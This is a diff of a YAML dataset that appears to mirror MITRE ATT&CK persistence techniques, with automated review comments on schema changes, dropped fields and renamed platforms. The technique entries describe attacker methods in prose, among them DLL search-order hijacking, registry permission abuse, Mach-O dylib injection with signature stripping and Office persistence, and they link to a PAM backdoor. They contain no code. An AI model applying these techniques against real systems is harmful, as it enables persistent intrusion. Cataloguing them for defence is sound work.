+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
@@ -27348,7 +27737,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27436,7 +27824,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27521,11 +27908,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27603,7 +27989,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
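Review bot: for T1133 the trailing block goes straight from `object_marking_refs` to `identifier: T1133` once `spec_version` is removed, with no `x_mitre_attack_spec_version` or `x_mitre_modified_by_ref` line, whereas every other object in this diff carries both immediately after the marking definition. If the generator placed them earlier in the object (as it did for T1648, where `x_mitre_attack_spec_version: 3.2.0` was inserted after `kill_chain_phases`) this is fine; otherwise T1133 has lost two keys the other objects keep, which is worth verifying given that its `modified` date also changed in this PR.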
@@ -27636,7 +28021,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27659,11 +28044,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
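Review bot: T1546.006 (LC_LOAD_DYLIB Addition) is left at `x_mitre_attack_spec_version: 2.1.0` with its `- User` permissions entry intact, and T1205.002 above likewise stays at 2.1.0, while the surrounding objects move to 3.2.0 and lose `x_mitre_permissions_required`. A file mixing two attack-spec layouts is legal, but readers can no longer assume a single schema; if the upstream bundle really still ships these objects at 2.1.0 that is expected, but if they were simply not refreshed, the regeneration should be re-run rather than merged as a partial update. The `modified` bump for T1053.007 to `2024-10-15T16:26:03.731Z` matches the dates on the other refreshed objects.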
@@ -27721,9 +28105,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -27804,12 +28187,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
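Review bot: the context lines L71339–L71340 carry a pre-existing line break between `HKLM\SYSTEM\CurrentControlSet\Services` and `. The information …`, so inside the `|-` literal block the Registry path ends one line and the next line starts with a period. This is upstream ATT&CK text rather than something this change introduced, but if the generator ever normalizes description whitespace this entry is the one to test against.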
@@ -27828,7 +28210,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -27842,7 +28223,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -27869,8 +28249,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27901,7 +28281,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
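Review bot: the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines added at L71373–L71374 are the same fields removed for this technique at L71345 and L71353, so the three T1574.011 hunks amount to a key reorder; the only field that actually disappears is `spec_version`. A fixed key order in the generator (sort keys, or emit them in upstream order every time) would keep future diffs down to the real changes and make regressions like a dropped field easy to spot.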
@@ -27958,11 +28339,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
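Review bot: T1542.003 keeps `x_mitre_attack_spec_version: 3.1.0` at L71381 while neighbouring techniques move to 3.2.0. That is plausible if the upstream object was last edited under spec 3.1.0, but since this regeneration clearly pulled a fresh bundle it is worth a spot check against the source to rule out a partially stale input.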
@@ -28034,9 +28414,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
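Review bot: the Microsoft Run Key reference at L71398–L71400 moves from the plain-HTTP msdn.microsoft.com link to the https learn.microsoft.com page, which is the right direction. The sibling entries at L71393 and L71403 still point at msdn.microsoft.com; that is upstream data and not something to hand-edit here, just noting that those links now resolve via redirect.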
@@ -28052,12 +28432,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28132,7 +28511,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28175,7 +28553,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28199,8 +28577,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
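Review bot: T1542.005 loses both `spec_version` and `x_mitre_attack_spec_version` at L71439–L71440 and, unlike T1574.011 or T1053.003, nothing re-adds `x_mitre_attack_spec_version` elsewhere in its block; T1505.002 gets the same treatment at L71883–L71884. Check that the upstream objects really lack the field, because any consumer that filters on attack spec version would silently drop these two techniques.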
@@ -28355,31 +28731,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
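Review bot: the block removed at L71453–L71471 (platforms, domains, marking refs, id, type, created, external references) reappears lower down at L71490–L71525 with identical values, so for T1053.003 the substantive changes are the `modified` update, the version bump to 1.2 at L71498, and the new boolean fields `x_mitre_deprecated: false` (L71482), `x_mitre_remote_support: false` (L71508) and `revoked: false` (L71513). Listing those three new keys in the PR description would save reviewers from reading the whole reorder to find them.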
@@ -28396,6 +28752,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28406,9 +28763,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28416,17 +28777,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
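Review bot: the T1137 description added at L71537–L71540 is byte-identical to the one removed at L71626–L71629, so the description is moved, not changed; the substantive change for T1137 is the platform rename from `Office 365` (L71532) to `Office Suite` (L71566) plus the version bump to 1.4 at L71567. Platform names are what the per-platform index files key on, so confirm the generator's platform list was updated in the same change or the Office techniques will drop out of those indexes without any error.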
@@ -28434,79 +28815,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
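Review bot: `x_mitre_permissions_required` (User, Administrator) is removed for T1137 at L71658–L71660 and never re-added; T1137.006 loses it the same way at L71834–L71836, while T1053.003 still carries it at L71504–L71505, so the field's presence now varies per technique. If that mirrors the upstream objects it is fine, but anything in the repo that reads `x_mitre_permissions_required` must treat it as optional from here on.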
@@ -28536,6 +28911,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28546,6 +28922,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28554,13 +28931,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
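Review bot: at L71695–L71702 the platforms `Office 365`, `Google Workspace` and `Azure AD` collapse into `Office Suite` and `Identity Provider` for T1098.003. Any index or filter keyed on the old platform names will now return nothing for this technique; confirm those consumers were regenerated or renamed alongside this file, and call the rename out in the PR description since it changes how users look up cloud techniques.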
@@ -28602,9 +28979,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28672,19 +29046,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28700,8 +29073,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28715,7 +29088,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -28741,6 +29114,10 @@ persistence:
